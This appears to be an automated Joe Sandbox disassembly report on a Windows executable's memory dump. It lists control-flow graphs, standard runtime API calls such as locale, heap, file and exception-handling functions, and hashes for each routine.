                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 442123175-0
                                                                                                                                                                                            • Opcode ID: 43033e4946245bd6ca83c7a6ca7bacbf1251f643b80314db364a30f56c608cae
                                                                                                                                                                                            • Instruction ID: 8728d54601268af49b8649a0d0d9480233cf637482907b17b39cdb2e7b5fb6fe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 43033e4946245bd6ca83c7a6ca7bacbf1251f643b80314db364a30f56c608cae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B219F34A002199FCB19CF69DD909E9B7F9EF8D301F2541A9E906D7211D630DE42CFA0

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 184 92ff89-92ff8e 185 92ff90-92ffa8 184->185 186 92ffb6-92ffbf 185->186 187 92ffaa-92ffae 185->187 189 92ffd1 186->189 190 92ffc1-92ffc4 186->190 187->186 188 92ffb0-92ffb4 187->188 192 93002b-93002f 188->192 191 92ffd3-92ffe0 GetStdHandle 189->191 193 92ffc6-92ffcb 190->193 194 92ffcd-92ffcf 190->194 195 92ffe2-92ffe4 191->195 196 93000d-93001f 191->196 192->185 197 930035-930038 192->197 193->191 194->191 195->196 198 92ffe6-92ffef GetFileType 195->198 196->192 199 930021-930024 196->199 198->196 200 92fff1-92fffa 198->200 199->192 201 930002-930005 200->201 202 92fffc-930000 200->202 201->192 203 930007-93000b 201->203 202->192 203->192
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0092FE78,00944948), ref: 0092FFD5
                                                                                                                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0092FE78,00944948), ref: 0092FFE7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3000768030-0
                                                                                                                                                                                            • Opcode ID: aa47c9248ed11686edd7704f6831cf21a57fd303f4a64dff3c7822826615cfaa
                                                                                                                                                                                            • Instruction ID: 27580b0372fe68e7fc169e882e8c17da221511bf992a650def8771da9a7d13f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: aa47c9248ed11686edd7704f6831cf21a57fd303f4a64dff3c7822826615cfaa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 161129711087114AC7344E3DADA8722BAACA797330F38072AD1B7C35F5C234D942DA41

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 204 92136e-9213b1 call 92ce80 call 92197e 209 9213b7-9213fa 204->209 210 9214c9-9214ce 204->210 211 92144e-921463 call 92408b 209->211 212 9213fc-921404 209->212 213 9214f0-921532 call 921ab6 call 921a10 call 9229c6 210->213 218 921466-92147b 211->218 212->211 214 921406-921409 212->214 216 92140d-921425 call 9219d8 214->216 228 9214d0-9214d5 216->228 229 92142b-921442 216->229 221 9214c0-9214c7 218->221 222 92147d-921485 218->222 224 9214e0-9214ec 221->224 222->221 223 921487-921489 222->223 227 92148a-9214a5 call 9219d8 223->227 224->213 235 9214d7-9214dc 227->235 236 9214a7-9214be 227->236 228->224 229->216 233 921444-92144c 229->233 233->211 235->224 236->221 236->227
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4218353326-0
                                                                                                                                                                                            • Opcode ID: 60a60203564a356444a34e7ac04cf8d2420dc18bffcef890af9c9f64810118cc
                                                                                                                                                                                            • Instruction ID: 3e2dcaec8ac06b31957892ac6cea65d74d95b0365aa7bffb163d2d78126a1011
                                                                                                                                                                                            • Opcode Fuzzy Hash: 60a60203564a356444a34e7ac04cf8d2420dc18bffcef890af9c9f64810118cc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0051BE353042148FC704EF6CD990B6AB7E6EBC8328F198668E95DCB3A6D630ED05CB41

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 238 923c29-923c43 239 923c45-923c47 238->239 240 923c4c-923c54 238->240 241 923d25-923d32 call 9229c6 239->241 242 923c56-923c60 240->242 243 923c75-923c79 240->243 242->243 248 923c62-923c73 242->248 245 923d21 243->245 246 923c7f-923c90 call 9244b9 243->246 250 923d24 245->250 254 923c92-923c96 246->254 255 923c98-923ccc 246->255 252 923cee-923cf0 248->252 250->241 252->250 256 923cdf call 9235da 254->256 261 923cf2-923cfa 255->261 262 923cce-923cd1 255->262 259 923ce4-923ceb 256->259 259->252 264 923d0f-923d1f 261->264 265 923cfc-923d0d call 92c578 261->265 262->261 263 923cd3-923cd7 262->263 263->245 266 923cd9-923cdc 263->266 264->250 265->245 265->264 266->256
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ab3a36871a35553b4f4e1914fc35fc684b99fce6221f976dc3de9a5d0dd9e3ff
                                                                                                                                                                                            • Instruction ID: 509eb66e17b210255a8ebf68139aa6007a9b791405f2683c86ae4d576e47d61b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab3a36871a35553b4f4e1914fc35fc684b99fce6221f976dc3de9a5d0dd9e3ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: D331B67291012AAFCF04DF69E8809EDB7F8BF09320B148226E941E3294D735FA44CB90

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 269 923c1b-923c20 270 923c22-923c28 call 928773 269->270 271 923c6e-923c74 269->271 273 923c76 271->273 274 923bf9-923c08 271->274 276 923cc4-923ccc 273->276 277 923c78-923c80 273->277 279 923cf2-923cfa 276->279 280 923cce-923cd1 276->280 282 923d0f-923d1f 279->282 283 923cfc-923d0d call 92c578 279->283 280->279 281 923cd3-923cd7 280->281 284 923d21 281->284 285 923cd9-923cdf call 9235da 281->285 287 923d24-923d32 call 9229c6 282->287 283->282 283->284 284->287 293 923ce4-923cf0 285->293 293->287
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3988221542-0
                                                                                                                                                                                            • Opcode ID: cda65b5d69d223980cc9ffcdfdce1cd401a8dbd6e9b6306d991ca73847ea1a66
                                                                                                                                                                                            • Instruction ID: 46036eaa580032e2a207b93eda80024736ce266e7e3d6cccd1df2f8de03c441f
                                                                                                                                                                                            • Opcode Fuzzy Hash: cda65b5d69d223980cc9ffcdfdce1cd401a8dbd6e9b6306d991ca73847ea1a66
                                                                                                                                                                                            • Instruction Fuzzy Hash: 160144367082760ACB05DA78B9667A8BB60EF86334B24C15FD842990CACA1A4A51C310

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 296 92e531-92e53d 297 92e56f-92e57a call 92ad6d 296->297 298 92e53f-92e541 296->298 305 92e57c-92e57e 297->305 300 92e543-92e544 298->300 301 92e55a-92e56b RtlAllocateHeap 298->301 300->301 303 92e546-92e54d call 92b92d 301->303 304 92e56d 301->304 303->297 308 92e54f-92e558 call 928f08 303->308 304->305 308->297 308->301
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,009231E1,0092186A,?,009260C1,0092186C,0092186A,?,?,?,00923181,009231E1,0092186E,0092186A,0092186A,0092186A), ref: 0092E563
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: b3ef9e70b831957a5df4f641bbe13afa4b2a5281fd78261e05a51640b27aa1a8
                                                                                                                                                                                            • Instruction ID: fc4360ec49df131a8ec7b53e1a9a9a1797aa6495a0443bdea84e36ead6be7344
                                                                                                                                                                                            • Opcode Fuzzy Hash: b3ef9e70b831957a5df4f641bbe13afa4b2a5281fd78261e05a51640b27aa1a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: D9E0ED319352306BEF206A6ABC81F9A3B8C9F827B8F140121FC45970DDFB60CD0082A1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00932B49,00000002,00000000,?,?,?,00932B49,?,00000000), ref: 00933211
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00932B49,00000002,00000000,?,?,?,00932B49,?,00000000), ref: 0093323A
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00932B49,?,00000000), ref: 0093324F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                            • Opcode ID: 580559755e1203b597d140b903503896893de723ae48e6b702c3150b2025e1df
                                                                                                                                                                                            • Instruction ID: 6d44dbec55c496c58d46e8e02100e0d9673d364b9ec02b06791d8015f1b6bb73
                                                                                                                                                                                            • Opcode Fuzzy Hash: 580559755e1203b597d140b903503896893de723ae48e6b702c3150b2025e1df
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E21B036684100AAEB348FA5DC45BA7B3AAEF94F50F66C524E91AD7110E732DF40DB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00932B1B
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00932B59
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00932B6C
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00932BB4
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00932BCF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                            • Opcode ID: 23da9d00e6029552aa6d899d85afe97637d9ab4c2c8659b0ab454b2de5930cb1
                                                                                                                                                                                            • Instruction ID: 417bf149b12e1ef3b017298094b9cc6683fdb5371b6e04867075ea8df5d2a786
                                                                                                                                                                                            • Opcode Fuzzy Hash: 23da9d00e6029552aa6d899d85afe97637d9ab4c2c8659b0ab454b2de5930cb1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F516D71A0021AABDB20DFA4DC45FAEB7BCFF59700F184469E550EB190EBB09A44DF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093384A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                            • Opcode ID: 4a83cf956dbf32c45d10f493f2cd78177b68215d80d30d6d3da39033ac4d63d1
                                                                                                                                                                                            • Instruction ID: 651e167da827b3fc9eb30a81eed8b395389eaf68c2b38b6bd79ecec8d891141d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a83cf956dbf32c45d10f493f2cd78177b68215d80d30d6d3da39033ac4d63d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A71E5B594516CAFDF20AF38DC9DBAAB7B9AF45300F1481D9E04997211DA354F849F10
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0092502C
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 009250F8
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00925111
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0092511B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 29042140781a03f73349fc4888533ebd01070d335c571572a8be689eaafd2050
                                                                                                                                                                                            • Instruction ID: 8422a7f47b27418a10ad4de0be9fb985180ab1abc83aff6c823e4b4fe57b835d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29042140781a03f73349fc4888533ebd01070d335c571572a8be689eaafd2050
                                                                                                                                                                                            • Instruction Fuzzy Hash: 11310A75D452289BDF20EFA4DD49BCDBBB8AF48304F1041AAE40DAB250EB719B858F45
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00932D53
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00932D9D
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00932E63
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                            • Opcode ID: 3410dc48cca7a2e6f3c79951acdf917b782dabe53f2346df3e84bcf3d6cd6ac5
                                                                                                                                                                                            • Instruction ID: ae59943dc6530e20dfdc75fa2944227644b82647991423bafbd548122ada30be
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3410dc48cca7a2e6f3c79951acdf917b782dabe53f2346df3e84bcf3d6cd6ac5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A618E71920217AFDB389F28DC82BAAB7A8FF44300F24417AE915C6185E778DA80DF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009231E1), ref: 0092B5B1
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,009231E1), ref: 0092B5BB
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00921542,?,?,?,?,?,009231E1), ref: 0092B5C8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                            • Opcode ID: dfb7e1951f59c184e43a4fc2f744aa218ba2d81b2127f5385f1eb854c14832f2
                                                                                                                                                                                            • Instruction ID: d2d4f39510e3f0a623e399b220c98e5d30e3d76a456be12e773c926a9aa5dc79
                                                                                                                                                                                            • Opcode Fuzzy Hash: dfb7e1951f59c184e43a4fc2f744aa218ba2d81b2127f5385f1eb854c14832f2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431C574951228ABCB21DF68ED89BCCBBB8BF48310F5041EAE41CA7251E7709F858F44
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092F807: HeapAlloc.KERNEL32(00000008,?,009231E1,?,0092E921,00000001,00000364,009231E1,00000003,000000FF,?,009260C1,0092186C,0092186A,?,?), ref: 0092F848
                                                                                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093384A
